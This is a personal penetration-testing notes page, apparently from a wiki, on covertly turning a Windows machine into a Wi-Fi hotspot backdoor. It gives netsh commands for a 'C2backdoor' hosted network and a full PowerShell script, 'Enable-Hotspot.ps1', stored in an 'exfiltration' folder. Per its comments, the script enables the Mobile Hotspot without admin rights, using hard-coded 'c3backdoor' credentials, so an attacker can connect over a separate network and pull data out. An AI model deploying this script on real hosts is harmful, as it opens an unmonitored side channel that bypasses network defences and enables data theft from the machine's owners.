Originally heard about this from [[Book - Advanced Penetration Testing - Hacking the World's Most Secure Networks#Chapter 7]]: ```bash netsh wlan set hostednetwork mode ="allow" ssid="C2backdoor" key="password" net start SharedAccess ``` Many posts say that you need to have an adapter that has the *Hosted Network* feature available: ```bash netsh wlan show drivers | findstr /i hosted Hosted network supported : No ``` But [see here](https://stackoverflow.com/a/50712007) why this is wrong. Basically there's a difference between the Hosted Network feature and the Mobile Hotspot feature, where the former is deprecated in Windows 10 and the latter is the newer implementation of it. Also, I was having problems with the hotspot but installing Windows Update number KB5014666 fixed it. You can enable the hotspot through *Settings* > *Network & Internet* > *Mobile hotspot*. ## Covertly Enable Hotspot You can use PowerShell to set the credentials for the hotspot and turn it on and off (without admin). The following script was taken from [here](https://w01f.xyz/2020/11/07/PluWeSh/), which in turn uses information from [this thread](https://stackoverflow.com/questions/45833873/enable-windows-10-built-in-hotspot-by-cmd-batch-powershell). I called this [Enable-Hotspot.ps1](https://github.com/MaroGol/pentestingScripts/blob/main/exfiltration/Enable-Hotspot.ps1) and it's in the GitHub repo. ```powershell # Background: # Enabling the hotspot allows us to connect to the machine through a separate network, # thus making it easier to exfiltrate data. # Taken from https://w01f.xyz/2020/11/07/PluWeSh/ # ------ # Be sure to include Ben N.'s await for IAsyncOperation: # https://superuser.com/questions/1341997/using-a-uwp-api-namespace-in-powershell # [Windows.System.UserProfile.LockScreen,Windows.System.UserProfile,ContentType=WindowsRuntime] | Out-Null Add-Type -AssemblyName System.Runtime.WindowsRuntime $asTaskGeneric = ([System.WindowsRuntimeSystemExtensions].GetMethods() | ? { $_.Name -eq 'AsTask' -and $_.GetParameters().Count -eq 1 -and $_.GetParameters()[0].ParameterType.Name -eq 'IAsyncOperation`1' })[0] Function Await($WinRtTask, $ResultType) { $asTask = $asTaskGeneric.MakeGenericMethod($ResultType) $netTask = $asTask.Invoke($null, @($WinRtTask)) $netTask.Wait(-1) | Out-Null } Function AwaitAction($WinRtAction) { $asTask = ([System.WindowsRuntimeSystemExtensions].GetMethods() | ? { $_.Name -eq 'AsTask' -and $_.GetParameters().Count -eq 1 -and !$_.IsGenericMethod })[0] $netTask = $asTask.Invoke($null, @($WinRtAction)) $netTask.Wait(-1) | Out-Null } $connectionProfile = [Windows.Networking.Connectivity.NetworkInformation,Windows.Networking.Connectivity,ContentType=WindowsRuntime]::GetInternetConnectionProfile() $tetheringManager = [Windows.Networking.NetworkOperators.NetworkOperatorTetheringManager,Windows.Networking.NetworkOperators,ContentType=WindowsRuntime]::CreateFromConnectionProfile($connectionProfile) # Check whether Mobile Hotspot is enabled #$tetheringManager.TetheringOperationalState $configuration = New-Object Windows.Networking.NetworkOperators.NetworkOperatorTetheringAccessPointConfiguration $configuration.Ssid = "c3backdoor" # Passphrase (As detailed in the 802.11 specification, a passphrase must contain between 8 and 63 characters in the standard ASCII printable character set.) $configuration.Passphrase = "c3backdoor123" # Wifi band (GHz) (0 -> automatic, 1 -> 2.4 GHz, 2 -> 5GHz) $configuration.Band = 0 # Use above configuration for the new hotspot AwaitAction($tetheringManager.ConfigureAccessPointAsync($configuration)) # Start Mobile Hotspot Await($tetheringManager.StartTetheringAsync()) ([Windows.Networking.NetworkOperators.NetworkOperatorTetheringOperationResult]) # Stop Mobile Hotspot Await($tetheringManager.StopTetheringAsync()) ([Windows.Networking.NetworkOperators.NetworkOperatorTetheringOperationResult]) ``` To tunnel the hotspot traffic through a VPN on the host machine, [[VPN#Windows 10 - Over Wi-Fi|see here]]. It's also possible to share the machine's internet connection over Bluetooth. For this, turn on Bluetooth and select it as the option in the Hotspot settings using the GUI. ## Internet over USB - Reverse Tethering [[2022-10-01_Sat]] - https://github.com/Genymobile/gnirehtet *** ## Footnotes Resources